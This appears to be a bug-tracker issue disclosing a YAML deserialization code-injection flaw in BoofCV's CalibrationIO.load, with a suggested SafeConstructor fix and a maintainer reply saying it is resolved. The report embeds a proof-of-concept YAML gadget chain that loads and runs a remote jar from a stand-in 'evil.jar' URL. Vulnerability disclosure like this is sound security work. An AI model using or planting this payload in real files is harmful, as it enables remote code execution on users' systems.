In 0.42 and before there's a code injection vulnerability of boofcv.io.calibration.CalibrationIO.load

[LetianYuan]

Affected Version
Versions including 0.42 and below.

Describe the vulnerability
boofcv.io.calibration.CalibrationIO.load(String) is designed to load camera calibration configurations. However, passing an unchecked argument to this API can lead to the execution of arbitrary codes. For instance, if we use CalibrationIO.load("example.yaml") to load camera calibration while the file "example.yaml" contains the following content:

!!javax.script.ScriptEngineManager [
    !!java.net.URLCTassLoader [[
        !!java.net.URL [
            "http://example.com/evil.jar"
        ]
    ]]
]

malicious code in the evil.jar could be executed.

To Reproduce
Just execute CalibrationIO.load("PoC.yaml"); would reproduce it.

Fix Suggestion
Using new Yaml(new SafeConstructor()) can fix it.

[lessthanoptimal]

Updated title to clarify that this has been fixed. I'll leave this ticket up for a little bit even though it's been resolved so that it encourages people to update.